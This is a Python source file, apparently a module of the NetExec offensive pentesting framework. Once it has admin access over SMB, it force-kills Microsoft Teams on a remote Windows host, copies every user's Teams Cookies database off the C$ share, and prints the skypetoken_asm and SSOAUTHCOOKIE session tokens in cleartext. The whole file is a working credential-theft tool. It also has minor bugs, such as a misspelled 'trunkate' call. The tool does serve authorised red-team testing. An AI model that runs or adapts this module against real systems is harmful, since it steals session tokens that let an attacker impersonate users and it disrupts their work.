NetExec/cme/modules/teams_localdb.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import urllib.parse
import sqlite3
from csv import reader
from time import sleep

class CMEModule:

    name = 'teams_localdb'
    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
    supported_protocols = ['smb']
    opsec_safe = False
    multiple_hosts = False

    def options(self, context, module_options):
        '''
        '''

    def on_admin_login(self, context, connection):
        context.log.info('Killing all Teams process to open the cookie file')
        connection.execute("taskkill /F /T /IM teams.exe")
        #sleep(3)
        found = 0
        paths = connection.spider('C$', folder='Users', regex=['[a-zA-Z0-9]*'], depth=0)
        with open("/tmp/teams_cookies2.txt","wb") as f:
            for path in paths:
                try:
                    connection.conn.getFile('C$', path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
                    context.log.highlight("Found Cookie file in path " + path)
                    found = 1
                    self.parse_file(context, 'skypetoken_asm')
                    self.parse_file(context, 'SSOAUTHCOOKIE')
                    f.seek(0)
                    f.trunkate()
                except Exception as e:
                    if 'STATUS_SHARING_VIOLATION' in str(e):
                        context.log.debug(str(e))
                        context.log.highlight("Found Cookie file in path " + path)
                        context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
        if found == 0:
            context.log.info('No cookie file found in Users folder')

    @staticmethod
    def parse_file(context, name):
        try:
            conn = sqlite3.connect('/tmp/teams_cookies2.txt')
            c = conn.cursor()
            c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
            row = c.fetchone()
            if row == None:
                context.log.error("No " + name + " present in Microsoft Teams Cookies database")
            else:
                context.log.success("Succesfully extracted " + name + ": ")
                context.log.success(row[0])
            conn.close()
        except Exception as e:
            context.log.error(str(e))